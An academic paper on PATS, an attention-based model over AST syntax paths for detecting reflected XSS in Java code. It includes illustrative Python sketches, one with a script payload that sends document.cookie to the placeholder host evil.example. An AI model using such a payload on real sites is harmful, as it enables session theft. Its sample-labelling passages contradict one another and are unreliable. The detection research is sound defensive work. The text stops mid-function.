Article

Detection of Reflected XSS Vulnerabilities Based on Paths-Attention Method

School of Information Science and Engineering, Shenyang Ligong University, Shenyang 110159, China
*
Author to whom correspondence should be addressed.
Appl. Sci. 2023, 13(13), 7895; https://doi.org/10.3390/app13137895
Submission received: 4 June 2023 / Revised: 30 June 2023 / Accepted: 4 July 2023 / Published: 5 July 2023
(This article belongs to the Section Computing and Artificial Intelligence)

Abstract
Cross-site scripting (XSS) is one of the most frequently exploited and most harmful web vulnerabilities. In recent years, many researchers have applied different machine learning methods to detecting network attacks, but these methods have not achieved high accuracy and recall and cannot effectively counter XSS attacks. Designing a model that achieves high accuracy and a truly proactive defense against reflected XSS vulnerabilities has therefore become a priority for maintaining user security on the web. In this paper, we propose a detection model for reflected XSS vulnerabilities based on the paths-attention method (the PATS model). The model first converts vulnerability data into an intermediate representation, the abstract syntax tree (AST); it then traverses the AST to generate multiple groups of syntactic paths and converts them into vector representations through word embedding matrices. As the neural network learns, the model extracts semantic features using an attention mechanism that assigns appropriate weights to the different groups of syntactic paths, improving training effectiveness and realizing the shift from passive to active defense. In addition, in the dataset processing section, we point out the shortcomings of the datasets used in current research and construct a reliable dataset of 1000 malicious samples from NIST and 10,000 benign samples from GitHub for experimentation. Experimental results show that, compared with other machine learning models, the paths-attention method achieves an accuracy of 90.25% and an F1-score of 81.62%, while halving the training time to 30 h.

1. Introduction

As the most common channel through which internet users interact with the internet, websites not only provide various services but also store users' important assets and sensitive information. When a web attack occurs, it can cause huge losses to businesses and erode user trust [1]. With the increasing complexity of website requirements in recent years and the varying technical skills of programmers, vulnerabilities are becoming more frequent. Among them, XSS vulnerabilities are commonly exploited by attackers for illegal purposes. XSS ranked seventh in frequency across the entire network in 2017 and had climbed to third place by 2021. Attacks caused by XSS vulnerabilities are both highly harmful and widespread. In recent years, Web 2.0 applications, which are far more interactive than the largely static Web 1.0, have gradually become mainstream. Web statistics show that 68% of websites on the Internet have potential XSS vulnerabilities. Well-known domestic and foreign companies such as Facebook, Twitter, Baidu, and Sohu have suffered attacks due to XSS vulnerabilities, causing incalculable economic losses.
There are many types of XSS vulnerabilities, among which the reflected XSS vulnerability is the most destructive and the hardest to prevent in advance. Reflected XSS (cross-site scripting) is a common web application security vulnerability [2]. Attackers can use it to execute malicious scripts in the victim's browser, thereby stealing sensitive information or performing malicious operations under the user's identity. The vulnerability works as follows: the attacker injects a malicious script into the response of a web application by constructing special links, forms, or other input parameters. When a user visits the infected page, the malicious script is executed, achieving the attacker's goal. These injected scripts usually contain JavaScript code that can steal user cookies and input data, and even simulate user actions.
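To make the reflection mechanism concrete, the sketch below (not from the paper) mimics a server handler that echoes a user-supplied search query into its HTML response. The function name `render_results` and the payload string are hypothetical illustrations; without output encoding, the injected `<script>` tag survives verbatim into the page, which is exactly what a reflected XSS attack exploits.

```python
# Minimal sketch of a "reflected" response, assuming a hypothetical
# search endpoint that echoes the user's query back into the page.
import html

def render_results(query: str, sanitize: bool = False) -> str:
    """Build an HTML response that reflects the user-supplied query."""
    shown = html.escape(query) if sanitize else query  # vulnerable when sanitize=False
    return f"<html><body><p>Results for: {shown}</p></body></html>"

payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"

# Without escaping, the attacker's script is reflected verbatim into the page.
assert "<script>" in render_results(payload)
# With output encoding applied, the payload is rendered inert.
assert "<script>" not in render_results(payload, sanitize=True)
```

Defenses such as context-aware output encoding (shown here via `html.escape`) neutralize the reflected payload, but as the paper argues, such passive filtering struggles to keep up with evolving attack techniques.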
To prevent such attacks, developers and security testers need to perform reflected XSS vulnerability detection on web applications [3]. However, traditional defense techniques do not perform well at detecting XSS vulnerabilities. They can be divided into passive and active defense methods [4,5]. Passive defense judges whether the server has been attacked by inspecting the payloads of user requests. Faced with constantly evolving attack techniques, however, passive defense technology falls short. Active defense finds the injection points of a website through black-box testing to determine whether XSS vulnerabilities exist and fixes them preventively [6]. However, black-box testing requires substantial time and computation for analysis, and even when injection points are found, white-box testing is still needed to locate the vulnerability in the source code [7]. This makes the method impractical for large-scale website source code.
This article proposes a paths-attention-based model for detecting reflected XSS vulnerabilities that addresses the low efficiency and poor accuracy of traditional detection methods. The rest of the article is organized as follows: Section 2 reviews recent research on this detection problem. Section 3 describes how the paths-attention method for reflected XSS vulnerability detection is established. Section 4 presents the simulation results and analysis of the vulnerability detection experiments, and Section 5 summarizes the work. Finally, the references used in this article are listed.

2. Related Work

At present, combining machine learning algorithms with vulnerability detection is widely recognized in the industry as a promising and practically significant direction. However, simply bolting an algorithm onto a detector is not enough to achieve ideal detection results; the combination must account for multiple factors. Machine learning also has many branches, such as neural networks, deep learning, reinforcement learning, and natural language processing. For XSS vulnerability detection, many scholars have made attempts in various directions without converging on a unified approach. This article groups these methods into categories and selects some representative studies for illustration.
The research on XSS vulnerability detection based on dynamic analysis was proposed by Gu Jiateng and others, who conducted in-depth research on the deduplication method of web pages, designed the generation and combination method of payload units, formulated rules for complete attack payloads, and finally detected XSS injection points on web pages. There are two drawbacks to this method: firstly, it requires a very comprehensive rule library to achieve ideal detection results; secondly, even if an XSS vulnerability is discovered, it needs to be located through source code before it can be fixed. Therefore, dynamic detection has low efficiency and poor flexibility.
Chen Jing from Nanjing University of Posts and Telecommunications proposed an XSS vulnerability detection method based on taint analysis and fuzz testing [8]. This method addresses the inefficiency of traditional XSS detection by combining the two techniques: taint analysis narrows down the area where tainted data sources are located and improves the efficiency of taint propagation analysis, and fuzz testing then detects XSS vulnerabilities automatically. Li Jie et al. proposed a DOM XSS vulnerability detection algorithm based on dynamic taint analysis [9], which uses dynamic byte-encoded taint analysis to construct a DOM model and modifies the browser's script engine to detect DOM XSS vulnerabilities [10]. William Melicher proposed a lightweight hybrid machine learning method for detecting DOM XSS vulnerabilities [11]. Targeting the difficulty of detecting DOM-type XSS, this method crawled 18 billion JavaScript functions from 100 websites, marked 180,000 functions as vulnerable using taint tracking, and trained a DNN on this dataset, yielding a low-latency, high-recall function classifier. Taint tracking marks some sensitive data as taint sources and records their propagation paths; when a sensitive data leak occurs, the entire propagation path is analyzed to locate the XSS vulnerability. The biggest advantage of this approach is its high accuracy. However, taint tracking requires significant computation time that cannot keep up with today's rapid, iterative development cycles, and conducting taint analysis requires proficiency in the target programming language.
Song Zitao and others proposed a code vulnerability detection method based on graph neural networks [12]. They parsed program source code into a slice dependency graph containing data and control dependencies, used graph neural networks to learn the structure of this graph, and finally used the trained model to predict vulnerabilities in the source code of test programs. Chen Hao et al. developed a code vulnerability detection method based on graph neural networks [13]. By analyzing the intermediate representation of source code, they obtained control flow graph features of the intermediate language, initialized basic block vectors with a word embedding algorithm to extract semantic information, and concatenated them into sample data for detection, achieving intelligent function-level code vulnerability detection. Lei Cui et al. proposed a WFG similarity-based code vulnerability detection method, which slices CFG graphs with vulnerability-sensitive keywords, calculates node weights in the CFG subgraphs to generate WFG graphs, and uses a bipartite matching algorithm to calculate WFG similarity, thereby completing similarity-based detection. Detecting XSS vulnerabilities from the perspective of graph neural networks is also an innovative approach: analyzing website source code and converting it into dependency or control flow graphs eliminates language barriers, reduces manual cost, and improves detection accuracy. However, converting website source code into graphs and learning their features requires significant computing power, and the convolutions performed by GNNs during learning may lose some feature information; therefore, although detection efficiency and accuracy have improved, they have not yet reached ideal levels.
Zhen Li et al. proposed a deep-learning-based software vulnerability detection system that targets software source code, determines the importance of keywords by counting their frequency in the code, and detects vulnerabilities by forming code gadgets mixed with control dependencies. However, this method can currently only detect multicategory vulnerabilities related to API calls in C/C++ programs. Hao Sun et al. proposed a code vulnerability detection method based on code similarity [14], which introduced a dataset of (vulnerability–vulnerability) and (vulnerability–patch) pairs and detected vulnerabilities by comparing the similarity between vulnerability–vulnerability pairs and the difference between vulnerability–patch pairs. This method uses Siamese networks, BiLSTM, and attention as detection models, treats website source code as text from the natural language processing perspective, and extracts features from source code with natural language processing methods for XSS vulnerability detection. Although such natural-language-processing-based methods can achieve high accuracy and recall, similarity-based detection struggles to distinguish vulnerable features among similar code.
This article proposes a code semantic-based reflection-type XSS vulnerability detection method to address the shortcomings of the existing model. The main research work is as follows:
  • From the perspective of code semantics, using the paths-attention model for reflection-type XSS vulnerability detection, applying advanced methods in natural language processing to the field of vulnerability detection, and adjusting experiments to obtain a superior detection model.
  • Constructing a reliable dataset. Currently, most datasets for reflected XSS vulnerability detection suffer from imbalanced positive and negative samples. To avoid this problem, this article selects the CWE-80 (XSS) files from the National Institute of Standards and Technology's (NIST) Software Assurance Reference Dataset (SARD) as negative samples and real project code as positive samples [15].
  • Implementing the vulnerability detection method. Based on a real-world vulnerability dataset, this article conducted simulation experiments that showed that our proposed vulnerability detection method has advantages in both efficiency and accuracy.

3. Vulnerability Detection Method Based on Paths-Attention

Through the analysis of relevant papers, it can be understood that the methods for vulnerability detection of XSS should be divided into three parts: dataset (data collection), model generation (i.e., which algorithm to use and how to process it), and results. The overall experimental process of this article is shown in Figure 1.
Starting from dataset construction, a reflected XSS vulnerability dataset suitable for the model experiments is built by mixing publicly available datasets and converting them with a code converter for training in the PATS model. The PATS model has two components: paths (code semantic extraction) and attention (the attention mechanism); adopting the attention mechanism improves the effectiveness of the paths and enhances the efficiency of vulnerability detection.

3.1. Theoretical Analysis of Paths-Attention Vulnerability Detection Method

3.1.1. Analysis of Semantic Extraction Method for Paths-Attention

There are several typical solutions for extracting semantic features from code at the current stage, including convolutional neural network (CNN), recurrent neural network (RNN), and long short-term memory (LSTM) extraction methods [16]. Srinivasan Iyer proposed a neural-network-based code summarization technique that uses LSTM models and attention mechanisms to extract features [17]. The purpose of this model is to generate high-level summaries of source code in a completely data-driven way. CODE-NN, the model proposed there, was trained on a new corpus automatically collected from Stack Overflow to produce semantic summaries of code snippets. Pavol Bielik's PHOG is a probabilistic model for generating code semantics, aiming to predict the semantics of code fragments [18]. It addresses a key problem by proposing an extensible and accurate probabilistic model that can be reused across different tasks and programming languages, and it was evaluated on a large and diverse JavaScript corpus of 150,000 files.
However, the code semantic extraction models above all traverse the AST of a code snippet to identify contextual nodes but ignore the path information between nodes. Uri Alon proposed learning distributed representations of code to capture node path information [19]. The main idea is to represent a code snippet as a single fixed-length code vector. Unlike the models in previous studies, this method decomposes a code snippet into groups of syntax paths in an AST and learns an aggregated representation of these groups through modeling. The syntax path groups capture syntactic structure and semantic information as well as contextual relationships.
This section decided to adopt the paths-attention code semantic extraction method from a theoretical perspective. This method can not only extract information from AST nodes but also obtain path information by decomposing AST into syntax paths. To demonstrate the advantages of this method compared to other methods in terms of semantic extraction, this article conducted a separate quantitative evaluation of the code semantic extraction process during experimental design, using recognized evaluation standards to prove the superiority of the code semantic extraction method.

3.1.2. Semantic Extraction and Vulnerability Detection Compatibility Analysis of Paths-Attention

At present, vulnerability detection from the perspective of source code is an established research approach. However, most source-code-based detection stays at the level of similarity, keywords, or self-learned features. Some representative detection methods are listed below.
Tree-LSTM: Hoa Khanh Dam and others proposed an automatic feature learning method for predicting vulnerable software components [20]. This model takes Java source files as its granularity, where each source file consists of imported Jar packages and a set of methods. It uses a tree-structured LSTM to extract features from each method and represents them as vectors, then uses pooling layers to output local features for the entire file. To handle cross-project situations, the authors cluster all tokens of the project's files using k-means to form a codebook table with multiple token states/categories, generating global features based on this table. Finally, the model combines global and local features and uses classifiers for vulnerability classification. The detection process of the whole model is shown in Figure 2.
From the figure, this model learns the source code files through an LSTM network. The output of the model is then fed into a pooling layer to obtain an aggregated feature vector. At the same time, bag-of-token states are used to generate global features for the entire file. After aggregating local and global features, the model uses them for vulnerability detection.
Paths-attention differs from the above methods in the granularity of the source code data used: function-level rather than file-level. Most vulnerability features in source code exist in only a few lines, so file-level granularity is too coarse and easily drowns out vulnerability features in the overall feature vector. In addition, the above model focuses on automatic feature learning, which greatly increases the system's computational complexity and reduces its detection efficiency. To avoid these drawbacks, paths-attention makes the following optimizations.
  • By using a function-based approach, the system reduces the learning cost for vulnerability features.
  • The introduction of attention mechanism enables the model to extract semantic information more effectively, and the detection efficiency is higher when finding vulnerability features in semantic features.
Code similarity: In Lei Cui’s vulnerability detection method based on code similarity, it is mentioned that most of the current research on using code similarity to detect vulnerabilities is based on the similarity of syntax structure and semantic features of the code. However, the biggest drawback of such methods is that they cannot distinguish between code fragments with similar semantics. Sometimes, even if the semantics are very similar, slight differences can lead to one having a vulnerability while another does not. To address this issue, Lei Cui proposed using a Siamese network combined with a bidirectional LSTM network and introduced an attention mechanism based on this foundation. The entire model processing process is shown in Figure 3.
From the figure, the author introduced common vulnerabilities and exposures (CVE), which specifies that two identical vulnerabilities in different versions should be considered similar; conversely, if a vulnerability is eliminated by patch code, the vulnerability and patch code should be considered different. This method avoids the drawbacks of similar semantic code fragments.
Due to the strict selection criteria mentioned above for CVEs, the sample size is relatively small. Therefore, the author used metric learning to conduct training. This method labels similar vulnerability functions as 1 and dissimilar patch functions as 0. By training and learning the vulnerability matching degree between functions and function libraries, if it exceeds a certain threshold, it is judged to have vulnerabilities.
The detection method proposed by Lei Cui has a major drawback: detecting vulnerabilities by comparing the similarity between vulnerable functions and the functions under test requires sample coverage that is large enough, and features that are rich enough, for comprehensive detection. However, his sample selection method is too strict, so the sample range cannot be sufficiently abundant. Therefore, although this method avoids the problem of detecting vulnerabilities among semantically similar code, it has significant limitations.
Paths-attention has made the following optimizations to avoid these drawbacks:
1. Difficulty in distinguishing between code snippets with similar semantics: The paths-attention method starts from the syntax path and decomposes code snippets into groups of syntax paths. Similar semantics may have similar syntactic structures, but the importance of the deeper syntactic paths is not necessarily the same. The semantic analysis process for two similar pieces of code is shown in Figure 4.
From Figure 4, although the two code snippets have similar syntax and structure, after parsing the syntax paths, it is found that the semantic focuses of the two code snippets are different. The red lines in the figure represent the most prominent syntax features, with other lines decreasing in order. Similar code snippets can be well distinguished in the PATS model.
2. Issue of the dataset's feature coverage: The model samples are selected from the National Institute of Standards and Technology (NIST) in the United States. After processing, a relatively rich set of samples is available for training, allowing the model to learn the semantic features of vulnerable code snippets as fully as possible. This gives the model both high accuracy and fast detection.
In summary, the semantic extraction method based on paths-attention is theoretically very suitable for detecting reflected XSS vulnerabilities.

3.2. The Composition of the Paths-Attention Vulnerability Detection Method

Another component of the PATS model is the attention mechanism. Figure 5 shows its architecture. As the figure shows, the path contexts allow the data to be preprocessed before entering the fully connected layer. After the fully connected layer, gradient information is passed not only to the preliminary aggregated vector but also to the attention vector, and the attention vector participates in generating the final semantic vector v. Incorporating attention helps the model focus on the information that matters for the task: by computing attention weights, the model automatically learns which parts are more important for reflected XSS vulnerability detection, enabling more accurate prediction, classification, and generation. Attention also helps establish global contextual relationships, so the model automatically attends to the information most relevant to the current position, making it a better semantic extraction method for the PATS model and enabling precise detection of reflected XSS vulnerabilities.
In subsequent sections, we will specifically explain code mapping (formation of AST tree) and provide details about the attention algorithm process.

3.2.1. Source Code Function Preprocessing

This article parses Java source code into an abstract syntax tree (AST) at the granularity of individual methods. This process ignores code details such as comments, blank lines, and punctuation. Each node in the AST represents a keyword that appears in the source code. Throughout this paper, the AST of a code snippet is represented as a tuple $\langle N, T, X, s, \delta, \varphi \rangle$, where $N$ is the set of internal (path) nodes, $T$ is the set of terminal nodes, $X$ is a set of values, $s \in N$ is the root node of the tree, $\delta : N \to (N \cup T)^{*}$ is a function that maps an internal node to its list of child nodes, and $\varphi : T \to X$ is a function that maps a terminal node to an associated value. Every node except the root appears exactly once in some child list.
An AST path of length $k$ is a sequence of the form $n_1 d_1, \ldots, n_k d_k, n_{k+1}$, where $n_1, n_{k+1} \in T$ are terminal nodes, $n_i \in N$ is a nonterminal node for $i \in [2, k]$, and $d_i \in \{\uparrow, \downarrow\}$ is the direction of movement in the tree for $i \in [1, k]$. If $d_i = \uparrow$, then $n_i \in \delta(n_{i+1})$; if $d_i = \downarrow$, then $n_{i+1} \in \delta(n_i)$. For an AST path $p$, this paper uses $start(p)$ to denote $n_1$ and $end(p)$ to denote $n_{k+1}$.
Combining the two definitions above, this paper defines a path context as a tuple $\langle x_s, p, x_t \rangle$ consisting of an AST path and the values associated with its terminals, where $x_s = \varphi(start(p))$ and $x_t = \varphi(end(p))$ are the values associated with the starting and ending terminals of the path $p$.
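As a rough illustration of these definitions, the sketch below uses Python's built-in `ast` module as a stand-in for the paper's Java parser: it treats `Name`/`Constant` nodes as terminals, records each terminal's root path, and joins two root paths at their lowest common ancestor to form the up-then-down AST path of a context ⟨x_s, p, x_t⟩. The helper names (`leaf_paths`, `path_contexts`) are ours, not the paper's.

```python
# Illustrative sketch of path-context extraction, assuming Python's ast
# module as a stand-in for the Java AST described in the paper.
import ast
from itertools import combinations

def leaf_paths(tree):
    """Return (value, [node-type names from root to leaf]) for each terminal."""
    out = []
    def walk(node, path):
        path = path + [type(node).__name__]
        if isinstance(node, ast.Name):       # terminal: identifier
            out.append((node.id, path))
            return
        if isinstance(node, ast.Constant):   # terminal: literal value
            out.append((repr(node.value), path))
            return
        for child in ast.iter_child_nodes(node):
            walk(child, path)
    walk(tree, [])
    return out

def path_contexts(code):
    """Pair every two terminals, joining their root paths at the common ancestor."""
    leaves = leaf_paths(ast.parse(code))
    contexts = []
    for (xs, ps), (xt, pt) in combinations(leaves, 2):
        i = 0                                # length of the shared prefix
        while i < min(len(ps), len(pt)) and ps[i] == pt[i]:
            i += 1
        # go up from x_s, through the lowest common ancestor, down to x_t
        p = list(reversed(ps[i:])) + [ps[i - 1]] + pt[i:]
        contexts.append((xs, tuple(p), xt))
    return contexts

ctxs = path_contexts("x = y + 1")
# e.g. the context between y and 1 passes only through their BinOp parent:
assert ("y", ("Name", "BinOp", "Constant"), "1") in ctxs
```

Each tuple corresponds to one ⟨x_s, p, x_t⟩ of the paper; a real implementation would also record the ↑/↓ movement directions along the path.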

3.2.2. Code Mapping

In this paper, the feature function Rep is used to convert code snippets into mathematical objects for learning models. Given a code snippet $C$ and its corresponding AST $\langle N, T, X, s, \delta, \varphi \rangle$, the set of all pairs of AST terminal nodes is denoted TPairs, as shown in Formula (1):
$TPairs(C) = \{ (term_i, term_j) \mid term_i, term_j \in termNodes(C) \wedge i \neq j \}$
Here, termNodes maps the code snippet to the set of terminal nodes in its AST. In this paper, $C$ is represented as the set of path contexts derived from it, as shown in Formula (2):
$Rep(C) = \{ \langle x_s, p, x_t \rangle \mid \exists (term_s, term_t) \in TPairs(C) : x_s = \varphi(term_s) \wedge x_t = \varphi(term_t) \wedge start(p) = term_s \wedge end(p) = term_t \}$
That is, $C$ is represented as a collection of tuples $\langle x_s, p, x_t \rangle$, where $x_s$ and $x_t$ denote the values of AST terminals and $p$ is the AST path connecting them.
The components to be learned in this model are the embeddings of values and paths (vocab_value and vocab_path) and a fully connected layer (matrix $W$). The two embedding vocabulary matrices, vocab_value and vocab_path, are defined so that each row of a matrix is the embedding associated with a specific object, as shown in Formulas (3) and (4):
$vocab\_value \in \mathbb{R}^{|X| \times d}$
$vocab\_path \in \mathbb{R}^{|P| \times d}$
The set $X$ is the collection of AST terminal values observed during training, and $P$ is the set of AST paths. The embedding size $d \in \mathbb{N}$ is a hyperparameter determined by constraints such as training time and model complexity. A set of path contexts $B = \{b_1, \ldots, b_n\}$ is extracted from the given code snippet and input to the network, where $b_i = \langle x_s, p_i, x_t \rangle$ denotes one path context, $x_s$ and $x_t$ are the values of AST terminals, and $p_i$ is the path connecting them. The values and the path are mapped into their respective embedding spaces, and the three embeddings are concatenated into a single context vector, as shown in Formula (5):
$c_i = embedding(\langle x_s, p_i, x_t \rangle) = [vocab\_value_s \,;\, vocab\_path_i \,;\, vocab\_value_t] \in \mathbb{R}^{3d}$
Since each $c_i$ is the concatenation of three independent vectors, a fully connected layer learns to combine them. Its output, the combined context vector $\tilde{c}_i$, is given in Formula (6):
$\tilde{c}_i = \tanh(W \cdot c_i)$
The weight matrix $W \in \mathbb{R}^{d \times 3d}$ is learned during training. tanh is the element-wise hyperbolic tangent, a commonly used monotonic nonlinear activation function with outputs in $(-1, 1)$, which increases the expressive power of the model. The fully connected layer multiplies the size-$3d$ context vector by the weight matrix, transforming it into a size-$d$ combined context vector (the height of $W$ determines the dimension of $\tilde{c}_i$), and then applies tanh element-wise to map each component into $(-1, 1)$.
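A minimal numpy sketch of this lookup-concatenate-project step follows, with illustrative random matrices standing in for the learned embedding tables and for $W$; the sizes and index values are arbitrary assumptions.

```python
# Hedged sketch of Formulas (3)-(6): embedding lookup, concatenation into a
# 3d context vector, and the fully connected tanh layer. Random values stand
# in for the learned parameters; only the shapes follow the paper.
import numpy as np

rng = np.random.default_rng(0)
d = 4                                          # embedding size (hyperparameter)
vocab_value = rng.standard_normal((10, d))     # |X| x d terminal-value embeddings
vocab_path = rng.standard_normal((20, d))      # |P| x d AST-path embeddings
W = rng.standard_normal((d, 3 * d))            # fully connected layer, Formula (6)

def combined_context(s_idx: int, p_idx: int, t_idx: int) -> np.ndarray:
    # Formula (5): concatenate the three embeddings into one 3d context vector
    c = np.concatenate([vocab_value[s_idx], vocab_path[p_idx], vocab_value[t_idx]])
    # Formula (6): project back to size d and squash element-wise into (-1, 1)
    return np.tanh(W @ c)

c_tilde = combined_context(1, 5, 2)
assert c_tilde.shape == (d,)           # size-3d input reduced to size-d output
assert np.all(np.abs(c_tilde) <= 1.0)  # tanh bounds every component
```

In the trained model these matrices are updated by backpropagation; here they merely demonstrate the shape bookkeeping of the layer.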

3.2.3. Attention Mechanism

The biggest technical challenge of the PATS model is combining the training model with an attention mechanism. Experiments showed that mapping code snippets into vectors with the method above did not, by itself, achieve ideal detection results in the XSS vulnerability classifier. Inspired by neural translation models in natural language processing, we observed that not all syntax paths are equally important: an algorithm is needed to highlight the more distinctive syntax paths, so an attention mechanism is introduced.
The attention mechanism works on the combined context vectors and continuously learns how to assign appropriate weights to different syntax paths, computed as shown in Formula (7):
attention weight $\alpha_i = \dfrac{\exp(\tilde{c}_i^{\top} \cdot a)}{\sum_{j=1}^{n} \exp(\tilde{c}_j^{\top} \cdot a)}$
where $a \in \mathbb{R}^d$ is a learned global attention vector and the denominator sums over all $n$ combined context vectors.
To better demonstrate the role of the attention mechanism in the model, a Java code snippet is selected as an example, as shown in Figure 6.
This code snippet is converted into an AST, and the attention mechanism annotates it according to the importance of the paths in the AST. The conversion result is shown in Figure 7.
As Figure 7 shows, a code snippet can be decomposed into many paths. The red syntax path carries the richest semantic feature information, followed by the blue and green paths, and finally the orange path. The remaining unmarked paths are also used as input for training but receive less attention. A mechanism that can assign different attention to syntax paths is therefore needed, which is why this model introduces the attention mechanism.
The aggregated code vector $v \in \mathbb{R}^d$ represents the entire code snippet. $v$ is the combination of the context vectors $\tilde{c}_1, \ldots, \tilde{c}_n$ weighted by their attention weights, as shown in Formula (8):
code vector $v = \sum_{i=1}^{n} \alpha_i \cdot \tilde{c}_i$
At each forward propagation step, a $\tilde{c}_i$ is obtained, and the attention weight for the current step is calculated from it. The backpropagation algorithm then updates the weights of each neuron. When the gradients of the model converge, the final code vector is obtained by combining the current $\alpha_i$ and $\tilde{c}_i$, and the aggregated semantic vector of the code snippet is output.
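Formulas (7) and (8) together amount to a softmax over the dot products with the global attention vector followed by a weighted sum. The numpy sketch below uses random stand-ins for the learned quantities; only the computation itself follows the formulas.

```python
# Hedged sketch of Formulas (7)-(8): softmax attention over the combined
# context vectors and weighted aggregation into the code vector v.
# The vectors here are random placeholders for learned values.
import numpy as np

rng = np.random.default_rng(1)
d, n = 4, 5                               # embedding size, number of path contexts
c_tilde = rng.standard_normal((n, d))     # outputs of the tanh layer, Formula (6)
a = rng.standard_normal(d)                # global attention vector (learned)

scores = c_tilde @ a                      # one dot product per path context
alpha = np.exp(scores) / np.exp(scores).sum()  # Formula (7): softmax weights
v = alpha @ c_tilde                       # Formula (8): v = sum_i alpha_i * c~_i

assert np.isclose(alpha.sum(), 1.0)       # weights form a distribution
assert v.shape == (d,)                    # aggregated code vector has size d
```

Because the weights sum to one, paths with larger scores dominate $v$, which is how the model emphasizes the more distinctive syntax paths.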
Algorithm 1 summarizes the process of extracting the semantics of an entire code snippet.
Algorithm 1: Neural Network Attention Mechanism
Input: Code snippet D
Output: Vector V
Process:
  Step 1: Convert code snippets to AST;
  Step 2: Traverse the AST to parse the syntax path, store the value of each node in a matrix called “vocab value”, and store the path in “vocab path”;
  Step 3: Embed the set of discrete vector groups into a continuous space and combine them into a single vector c i
    Step   4 :   Calculate   the   dot   product   of   weight   matrix   W   and   c i ,   and   map   the   result   to   ( 1 , 1 )   through   activation   function   tan h .   The   result   is   denoted   as   c i ~
   Step   5 :   Compute   the   dot   product   between   c i ~   and   the   global   attention   vector   α ,   then   normalize   to   obtain   the   weight   α i   for   each   c i ~
   Step   6 :   Add   up   the   weighted   values   α i multiplied   by   their   corresponding   c i ~ to obtain the aggregated vector v.
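Steps 4–6 above (i.e., Formulas (7) and (8)) can be sketched in NumPy as follows. The context vectors `C`, weight matrix `W`, and global attention vector `a` are random placeholders here; in the real model they are learned during training.

```python
import numpy as np

rng = np.random.default_rng(0)
d, n_paths = 128, 5

# Step 3 output: one combined context vector c_i per syntax path (width 3d).
C = rng.normal(size=(n_paths, 3 * d))

# Step 4: fully connected layer followed by tanh -> c~_i in (-1, 1).
W = rng.normal(scale=0.05, size=(d, 3 * d))
C_tilde = np.tanh(C @ W.T)

# Step 5: dot product with the global attention vector a, then softmax.
a = rng.normal(size=d)
scores = C_tilde @ a
alphas = np.exp(scores - scores.max())
alphas /= alphas.sum()                        # attention weights, Formula (7)

# Step 6: weighted sum -> aggregated code vector v, Formula (8).
v = (alphas[:, None] * C_tilde).sum(axis=0)
```

The resulting `v` has dimension d = 128 and the weights `alphas` sum to 1, so distinctive paths can dominate the aggregate without changing its scale.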

4. Experimental Design and Analysis

After training the PATS model on the dataset, we obtained the final experimental results, which are analyzed in two parts: semantic extraction results and XSS vulnerability detection results. The analysis of the semantic extraction results shows that the model used in this paper has advantages over other models for code snippet semantic extraction and preserves code semantics as fully as possible, providing a basis for the subsequent XSS vulnerability detection. The analysis of the XSS vulnerability detection results shows that the proposed code-semantic-based XSS vulnerability detection method is effective compared with other vulnerability detection methods.

4.1. Dataset Construction

In this section, we encountered the problem of imbalanced positive and negative samples when selecting a dataset for detecting reflected XSS vulnerabilities. The datasets used in previous research fall roughly into two categories: open-source project datasets and PROMISE datasets. Both suffer from imbalanced positive and negative samples; their statistics are shown in Table 1.
As Table 1 shows, the ratio of negative to positive samples in the two datasets is at most 0.4866% and as low as 0.05265%. Such imbalance can cause serious bias, yielding a model with high accuracy but a low AUC.
To solve this problem while ensuring the authenticity of the data, the experiment combined two reliable sources. On one hand, it adopted the Software Assurance Reference Dataset (SARD) from the National Institute of Standards and Technology (NIST) [21] and extracted 1000 XSS vulnerability samples from the files labeled CWE80_XSS as negative samples; on the other hand, it selected 10,000 function methods from the source code of the top 10 Java projects on GitHub as positive samples. According to the privacy policy on the official NIST website, a privacy protection risk framework is applied to minimize risks caused by privacy issues, and the 10,000 positive samples selected from GitHub are open-source code involving no personal privacy. The dataset construction process therefore avoids ethical issues and privacy risks. The final ratio of negative to positive samples is 1:10. The dataset was split into a training set (75%) and a test set (25%).
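The 75/25 split described above can be sketched with the standard library; the function name and fixed seed are illustrative, not taken from the paper's code.

```python
import random

def split_dataset(samples, test_frac=0.25, seed=42):
    """Shuffle labeled samples and split them into a training set (75%)
    and a test set (25%), as described above. A minimal sketch."""
    rng = random.Random(seed)          # fixed seed for reproducibility
    shuffled = samples[:]
    rng.shuffle(shuffled)
    n_test = int(len(shuffled) * test_frac)
    return shuffled[n_test:], shuffled[:n_test]   # (train, test)
```

With the 11,000-record dataset this yields 8250 training and 2750 test samples.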

4.2. Data Preprocessing

First, the dataset must be labeled. This article divides it into two categories: samples with vulnerabilities, labeled 1, and samples without vulnerabilities, labeled 0. During learning, the vulnerability detection model is supervised by these labels to learn how to distinguish vulnerability features and achieve the goal of detecting XSS vulnerabilities. A code snippet with an XSS vulnerability is marked “1”, as shown in Figure 8.
This code snippet is excerpted from the real backend code of a web project. Its purpose is to receive the request body from the user on the frontend page, which includes form information submitted by the user. The part highlighted in red is a method that checks user input; without this check, the function could contain an XSS vulnerability. In other words, missing input validation is one of the significant characteristics of an XSS vulnerability, and because this snippet performs the check, it is marked 0 in the dataset.
Additionally, since the crawled project data may contain empty, duplicate, and noisy records, we removed duplicates and null values and supplemented the dataset with new samples until it reached 11,000 records, reducing the impact of dirty data on the training results.
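The cleaning step above can be sketched as follows; `samples` is assumed to be a list of (code, label) pairs, and the function name is ours.

```python
def clean_samples(samples):
    """Drop empty and duplicate code snippets before training
    (a sketch of the preprocessing described above)."""
    seen = set()
    cleaned = []
    for code, label in samples:
        if code is None or not code.strip():
            continue                  # drop null/empty records
        key = code.strip()
        if key in seen:
            continue                  # drop exact duplicates
        seen.add(key)
        cleaned.append((code, label))
    return cleaned
```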

4.3. Model Parameters

To determine the hyperparameters of the model and optimize its overall performance, this article fixes them as follows, given the system environment and computing power described above.
K = 200: the maximum length of each syntactic path is 200.
d = 128: the dimension of the discrete vector for each syntactic path is 128. The input dimension of the fully connected layer is therefore 3d = 384 and its output dimension is d = 128, which also fixes the dimension of the global attention vector $a$ at 128.
The optimizer is Adam, the dropout rate is 0.25, and the cross-entropy loss function is used.
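For reference, the hyperparameters above can be collected in one place, together with the padding implied by K = 200 (every path must be forced to a fixed length before batching). The dictionary keys and the helper function are illustrative, not from the paper's code.

```python
# Hyperparameters from Section 4.3 (key names are illustrative).
HYPERPARAMS = {
    "max_path_length": 200,   # K
    "embedding_dim": 128,     # d
    "fc_input_dim": 384,      # 3d
    "dropout": 0.25,
    "optimizer": "Adam",
    "loss": "cross_entropy",
}

def pad_or_truncate(path_ids, k=HYPERPARAMS["max_path_length"], pad_id=0):
    """Force a syntactic path (a list of token ids) to length K,
    padding short paths and truncating long ones."""
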